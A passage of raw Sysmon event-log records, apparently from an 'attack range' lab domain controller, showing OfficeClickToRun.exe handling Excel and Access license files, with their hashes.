Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019VL_MAK_AE-pl.xrm-msMD5=70B3206FC67A7A7C80F07FA9429E82AE,SHA256=E552FF7363CFB5FF392EAA3F9B042985B945EBD49B998693B96F19A0D93D5D85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019VL_KMS_Client_AE-ul.xrm-msMD5=D2B99220040872C56403E7A8010794D5,SHA256=A066A9BE269223D57680B86B41DCBF82AF9C81DC8EC154D0D64A9A4C69115B0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019VL_KMS_Client_AE-ul-oob.xrm-msMD5=9348AF020F3831B17E642C8A65E54739,SHA256=07CB143CC0870631661F0467B28E9CE79B9D7EEAAD1D88493BF4EED2BD573A7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019VL_KMS_Client_AE-ppd.xrm-msMD5=43B0A21587171FAF11F3648C4186C71C,SHA256=934F2B024D7898CCCD4638825074D635D1A152DF702A9AD4EB5D9837045DC09D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_Trial-ul-oob.xrm-msMD5=6CE3879D4AC3E21591D1DEF4972D7674,SHA256=5919A4A055597520348A2C1DACA5DA65DAEF8C03755EF8DEAC9E28098FFC955A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_Trial-ppd.xrm-msMD5=41E7EBA2BAC7111562691EA09B4DA3B7,SHA256=6ED0013EDB1858D152F0782A2D15CEAD6F8A04ED4861B0A7BE0E44F2AC97590A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_Trial-pl.xrm-msMD5=C67029A936CC063A6640A1BC2FD4EDC2,SHA256=3A3DCE0C6651A27E11ED1EB764822BCF518AF3D548BEFB0FE724428E4A43B8D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_Retail-ul-phn.xrm-msMD5=DC7EEC12073083A4FA0F387F19544A62,SHA256=73F7B6A2951F04BD04798CDE20414CB018B6573EA74B41A9721B7481E2981B0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_Retail-ul-oob.xrm-msMD5=4EAFE05B2FC67C874769199C8946CF50,SHA256=422FDC055A4EE1F7743B51442AB62A50B0F7B97D88A32C787B3CEE2EF4B53CFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_Retail-ppd.xrm-msMD5=5C073D608761A090AB226A94631D6AC3,SHA256=5D3B508CAB96C1CE7009C637FD05EEFA8BAD04A8EF156D1C1DFEFBF66548B5A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_Retail-pl.xrm-msMD5=03D535AC3F7A7BAD70046DC1349C21A9,SHA256=B9821B43AAFE725571DE457A82AFA51DC37B837344CAED1B40D7219D3C460005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_OEM_Perp-ul-phn.xrm-msMD5=3A171DFB2F2952456EB8B98E257E9D03,SHA256=C607995001D835918182A28C2C0DB0AFF50A19B46A9D57C63C5B9BD9B7226A08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_OEM_Perp-ul-oob.xrm-msMD5=8DFCA01D6AFAF14D4D1128C72169878E,SHA256=6A4072EC0BD1B483AB58AAAF55EB3FE7D95A14EFAA7A323675EE0567BE42A7B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000067000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_OEM_Perp-ppd.xrm-msMD5=0B631DFDB90C4EA7144232155F1AD48F,SHA256=FD969DD496860DB8A1BD3C233D7B360AC537F57EF8B6F82D693EA44AC671862F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_OEM_Perp-pl.xrm-msMD5=6D4860B88D8FD627ECB2669F39BB6C40,SHA256=340BE55FD04EF9C7C3C3C3621F0FFD8932049A1E82BFDC31897752F02AB56D4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_Grace-ul-oob.xrm-msMD5=3970D24DAC6A8ECF7928F93F8D3DC8C9,SHA256=272CAB10632FA86479CC73E5E21E6D1BEDC9C5081169BD4F57AE7724B08EEB09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\Excel2019R_Grace-ppd.xrm-msMD5=FE5456F9ED3912EDD52089C081B42DA4,SHA256=E2C3EA9176F167501B3299BDF2DB48FE2FF3030C89F96028E6F73BBAD35BEEE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\client-issuance-ul.xrm-msMD5=69BDE5ACBB8723203B1E317C0A217B31,SHA256=E808FC6A3C9B7C61F021EA14A20EE404295FDE0B4DBDA5515898C107C9FBD50D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\client-issuance-ul-oob.xrm-msMD5=49E8194FF6E307C63E0C1293F946E186,SHA256=1A45FBEA6FB402C3A75F4DE9191C124D08039FA92883D19B17B340EA84CD419E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\client-issuance-stil.xrm-msMD5=502C87C767AC7EDCC1BACD37916A00F3,SHA256=F4D7456C441A900BF768EC20193F9C3B207847FC00690A45D8CD92DB4538FCA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\client-issuance-root.xrm-msMD5=8997C29741270F5FBEF1FF0A287D9F3F,SHA256=2410EBDA5F84CC1E76463B6C4F35CF6B393375114D3ABC14952037DAFE83A4AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\client-issuance-root-bridge-test.xrm-msMD5=24D6F31ABBB21BF0194B0AC66899C285,SHA256=9988E2C488937CE69A8FBAF77EF09704D3A8B52603A53BF33034D53364B7C435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\client-issuance-bridge-office.xrm-msMD5=33C1695D278F5917F28067D27B4868EE,SHA256=65BCCC008F5B44D2DBD880C0C33AFCFFF27C07DD24DC0CC7DDA2B3BFA7E9AE74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\c2rpridslicensefiles_auto.xmlMD5=75275D6D597279C846A71C0E67FB9743,SHA256=A09F2C644AB6A041501CEB4E28661DA5C5EB2429D5A20B04569EE174F390B9A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessVL_MAK-ul-phn.xrm-msMD5=145558040BF74A67B6C076E50DAA5310,SHA256=CA31CF1D36061182080689C14CAF7A8B99B42B03BF5AA4F37919EDA6F3AFD8D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessVL_MAK-ul-oob.xrm-msMD5=D47961E13C88AB6FCD3EF63C7CEFBC90,SHA256=2D4FEF451DDD3D69059BEA675F4C558C3C42F1AC87DC2CA2C152C0AC1628D0B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessVL_MAK-ppd.xrm-msMD5=14C1CEAE55C8DA84F8AADCF925C9511A,SHA256=60AF756E4C47DBEC61B5F588B267580607F980E0F22D60DFF7613C5178301120,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessVL_MAK-pl.xrm-msMD5=5DB1077CFB7469D7CC459E3934DEFF97,SHA256=926EFD8310E17F64584CF8BCA5D4A7D5460E0355A5CC7215DC9740E0331EE990,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessVL_KMS_Client-ul.xrm-msMD5=DC55F11D4C03D964BFE4BD07D5033680,SHA256=90B6CF5AF04174CD3D0111375A153CE1C2EE4B2AB246CD93B5D1E25FCCBE1FD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessVL_KMS_Client-ul-oob.xrm-msMD5=4A36C40226B2DB9778163C6A7CC92409,SHA256=45966DD4CC4EC9F80CB184B0AE2F9429E0601E1ECCCE3A5283DA8EDA5EA0A300,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessVL_KMS_Client-ppd.xrm-msMD5=084B3C3A2249F1E90EE9079A496909C2,SHA256=16BBBEF0F87E5B10A43CF280F3752DA9ED33EE95711B85D4A0DB6D6AF7F338E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_Trial-ul-oob.xrm-msMD5=7D6568D221BA12FB2970373DA2B4F559,SHA256=475580EB3D099DDB4D7B49BF8AE69E786C33413A28DF399E9D0F41582CD9EE4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_Trial-ppd.xrm-msMD5=F1ABA8675CF15574C3CFF7C688C1A59B,SHA256=588984E97C682FE740DFAB50FEAF05D4DE4DFF2BFF01465AB5804C65E9516817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_Trial-pl.xrm-msMD5=F31AA3CFE72089934DA55FAE447938EC,SHA256=BAF0D87C35E4A83ABC2257500519FF2F850E05BB8BCD0A75FC7F69A74535F88C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_Retail-ul-phn.xrm-msMD5=A2765AD8422DBD9F5B1B58D32AD88104,SHA256=A67C20F97ABBDE2E476F421BA7FE33642C46D3F8C19D84277A916D319AC29618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_Retail-ul-oob.xrm-msMD5=78102FD22DFD589A4EF02D47F8AD80FB,SHA256=15E27BEA75C07DB95EC453B45BA40BF60D0AF1BF0D5168C1C983A72F731CA57C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066977Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_Retail-ppd.xrm-msMD5=C99F8BD6A66C7FFF9CDC30E2C2666AF2,SHA256=FA325439B8F38DE4F01478B5FEC4CC2FBC1265E7FCB44D8A9226AC6B179DDC38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066976Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_Retail-pl.xrm-msMD5=1FB2AD0853F3CC3B4E2F39BB64717446,SHA256=AD7B6B198065F06D6C3DC553477332ACB7023D51FE4176D30015279785737AF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066975Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_OEM_Perp-ul-phn.xrm-msMD5=1FA6631B172A03EB386273DCB93ABF94,SHA256=66BD0EA2A66216C6DE7E042499D4048F9AF0AFD52C107DB3A28E71E695782204,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066974Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_OEM_Perp-ul-oob.xrm-msMD5=F0D915B4D0EAF56DD27800D406C1B119,SHA256=672EA470E59E507ECA5D5D06447CA507E7C40327AC9CE00F32128C0A052217B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066973Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_OEM_Perp-ppd.xrm-msMD5=8C4E9A288EC7285F9B94676BD00305CB,SHA256=EAC64B198C3A5F7090AD93F0981F9D7D404441BAEC82316DA7F791C163731B24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066972Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_OEM_Perp-pl.xrm-msMD5=0CEF32C21A4494BEDF3BE1B6E85C80FD,SHA256=CFEA898160207C4AFBDC9AD65664705FEE3B7B63C0AFCA6287005CB67CBCEC95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066971Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_Grace-ul-oob.xrm-msMD5=BD9B947A8BB118C6C519004F0D3B9102,SHA256=2BF66AFF37CABE61800A0B9E62D995B3D040B20A4F9BF487A8A34679219136DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066970Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Licenses16\AccessR_Grace-ppd.xrm-msMD5=19214C5A04B628235193BACA9B7DE1AD,SHA256=CAEEFB9AA30EA4327030534FB5E6B700E145953F4C2267D4B7F522CB1FAD5B10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066969Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:13.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 